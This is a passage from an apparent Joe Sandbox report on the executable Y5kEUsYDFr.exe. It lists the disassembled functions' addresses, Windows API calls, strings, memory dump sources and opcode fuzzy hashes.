                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                  • Instruction ID: 3d4e6d3db7c959eb47553c5a476373fa88b3d69913c999a62002850e300a9144
                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                  • Instruction Fuzzy Hash: 7D41B222A28A8186EB208F65F8543BA77A0FB98795F444131EE8EC7798DF7CD442C740
                                                  Function 00007FF6CA9E90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ObjectRelease
                                                  • String ID:
                                                  • API String ID: 1429681911-3916222277
                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                  • Instruction ID: 82d7f27b8b92c908fdecbba13803dc5722ae6a30bd0bea954b35845556d50bcd
                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                  • Instruction Fuzzy Hash: 8F315C3560874186EA548F53B828A6ABB70F788FD2F005535ED8E83B54CE3CD09ACB00
                                                  Function 00007FF6CA9DE870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8BB
                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8CB
                                                  • CreateEventW.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                  • String ID: Thread pool initialization failed.
                                                  • API String ID: 3340455307-2182114853
                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                  • Instruction ID: 3f3f3a77053cf51f2cc1feb82fd310a1726b8f458b63971c0b349bd79c286180
                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                  • Instruction Fuzzy Hash: FE210832E1564186F7148F65F4653AD32A1EF98B0EF188034CA8DCB286CF7E9896C784
                                                  Function 00007FF6CA9E85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CapsDeviceRelease
                                                  • String ID:
                                                  • API String ID: 127614599-3916222277
                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                  • Instruction ID: a5ebe3488c1bb7b62c3546af588fd419df35cd8c095d37fafabceabafb14d64f
                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                  • Instruction Fuzzy Hash: 70E08C20B0864182EF685FB6B59D02A2261AB4CBD1F198135DA5F87B94DE3CC4E64300
                                                  Function 00007FF6CA9CD1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                  • String ID:
                                                  • API String ID: 1137671866-0
                                                  • Opcode ID: 580eb8bd8f76e11621dd22c3f902231a9c49c84aaab9ae48d1a37248dc949a6d
                                                  • Instruction ID: 45d94528271b1d5de597250266ca472c5b109c8b9892d50b6f1d8d8c12740b89
                                                  • Opcode Fuzzy Hash: 580eb8bd8f76e11621dd22c3f902231a9c49c84aaab9ae48d1a37248dc949a6d
                                                  • Instruction Fuzzy Hash: 74A1C662B28A9181EA10EF65F8661AD6371FF85789F405171EACDC3AEADF3CE545C300
                                                  Function 00007FF6CA9E0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: 38f5882c6b65f2a691eaa35e16abd0289ae7d829c28f25cf5369e5845229c7f4
                                                  • Instruction ID: a74f05cf08e25790743cca206267eaea0b3d4c55b3078dee3cab122aad350251
                                                  • Opcode Fuzzy Hash: 38f5882c6b65f2a691eaa35e16abd0289ae7d829c28f25cf5369e5845229c7f4
                                                  • Instruction Fuzzy Hash: 0951D472B64A4295FB00AF75E4662EC2321FB88BD9F404275DA9CD77D7DE28D141C340
                                                  Function 00007FF6CA9FDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                  • String ID:
                                                  • API String ID: 4141327611-0
                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                  • Instruction ID: 793fed8dd9dcaa4a572feb827cf93408100ec127c853603dc4426007031860ab
                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                  • Instruction Fuzzy Hash: 5D41D73192868246FB619E50B8663797290EF40B9AF154179FACDC7AE7CF7CD4418701
                                                  Function 00007FF6CA9D3980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3823481717-0
                                                  • Opcode ID: c1c548311496109c7c973564b1f0111f496352b18342627c01e39ee1156b1353
                                                  • Instruction ID: 8abdc966d0f0769b166763aeb327cd69f180b59ee8b39620d5ce23e34160cf69
                                                  • Opcode Fuzzy Hash: c1c548311496109c7c973564b1f0111f496352b18342627c01e39ee1156b1353
                                                  • Instruction Fuzzy Hash: F341B262F24B5184FB00CFB5E8961AD3371BF44B96B005275EE9DABA9ADF78D085C300
                                                  Function 00007FF6CAA00B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00B91
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00BF3
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00C2D
                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6CA9FC45B), ref: 00007FF6CAA00C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                  • String ID:
                                                  • API String ID: 1557788787-0
                                                  • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                  • Instruction ID: 52c11a29922396885a304bc6e54a4a972aa13419ab03e327ca48a78b88f3ff1f
                                                  • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                  • Instruction Fuzzy Hash: EF217131F19B9181E6249F52B464029B6A4FB98FD1B494174DEDFA3BA8DF3CE4538304
                                                  Function 00007FF6CA9CDE04 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                  • String ID:
                                                  • API String ID: 2767541406-0
                                                  • Opcode ID: 5654bcca214520ce5c59c20fe73351a0b2af752cbeb51540c01220f8dc932e82
                                                  • Instruction ID: 97edc6607a4dcdc18bca2e63372c68f5c16dc87f4b23522bda018c001e956205
                                                  • Opcode Fuzzy Hash: 5654bcca214520ce5c59c20fe73351a0b2af752cbeb51540c01220f8dc932e82
                                                  • Instruction Fuzzy Hash: 78118132A1CB4282E7508F61F86556A77B0FB88B81F444176EACEC3A68CF3CD146CB40
                                                  Function 00007FF6CA9FD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$abort
                                                  • String ID:
                                                  • API String ID: 1447195878-0
                                                  • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                  • Instruction ID: f3f0ad17e4661f9c92673ab16876a0aea1d4068f7ae44bb57374d081dda9b2f4
                                                  • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                  • Instruction Fuzzy Hash: 2C016910B2964642FA586FA5BE7B53821A15F487DAF0444BCE99FC37E7ED2CF8414200
                                                  Function 00007FF6CA9E8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                  • Instruction ID: 77f751604cf018e9f80ef48fa0281cd894ee208dabe064b085f2ae4eb66bfaca
                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                  • Instruction Fuzzy Hash: 79E0ED60E0960282FF595FF2B86D13625A0AF88743F0885B9C85FC7391DD3CA1A68714
                                                  Function 00007FF6CA9CE34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: DXGIDebug.dll
                                                  • API String ID: 3668304517-540382549
                                                  • Opcode ID: a08899e38426230943dcdae29aa39143af9d13bf0e4c208fbdbfd644d4e58482
                                                  • Instruction ID: 9e916d0efed7796207ac27442cca271fd7eb9cd398b746f6f262ba14512c6ddc
                                                  • Opcode Fuzzy Hash: a08899e38426230943dcdae29aa39143af9d13bf0e4c208fbdbfd644d4e58482
                                                  • Instruction Fuzzy Hash: 3A71CC72A24B8186EB14CF25F8513ADB3A8FB54798F504235DBAD87B96DF78D0A1C300
                                                  Function 00007FF6CA9FE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: e+000$gfff
                                                  • API String ID: 3215553584-3030954782
                                                  • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                  • Instruction ID: 2a535d69360623c55ee29c5fd0e67c7bd6b23f64519f5e4ac3638fc953a757c5
                                                  • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                  • Instruction Fuzzy Hash: DA511862B287C146E7258F35AC523AD6BA1A781B91F0C8279EADCC7BD6DF2CD444C700
                                                  Function 00007FF6CA9D9408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                  • String ID: SIZE
                                                  • API String ID: 449872665-3243624926
                                                  • Opcode ID: 3190869bd73ecd60fb0f53392e682d412e6871c3627f6ccf45194b60311ac42a
                                                  • Instruction ID: c75886457df884e1530668cbf81df12f3cb505046de89a447c2647e3f78d8fe9
                                                  • Opcode Fuzzy Hash: 3190869bd73ecd60fb0f53392e682d412e6871c3627f6ccf45194b60311ac42a
                                                  • Instruction Fuzzy Hash: 9141D566E3864285EA10EF68F4523BD6360EF95792F504271EADDC2AD7EE3CD581C700
                                                  Function 00007FF6CA9FC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                  • String ID: C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                  • API String ID: 3307058713-2461666950
                                                  • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                  • Instruction ID: a17e70511042e791d829b8920e2c478d330a2ee63f68db8da8c5afca9c509302
                                                  • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                  • Instruction Fuzzy Hash: 2441B232A28A4286EB14DF66B8620BD7794EF44BD5B448079FD8EC7B56DE3CE442C340
                                                  Function 00007FF6CA9D9638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_snwprintf
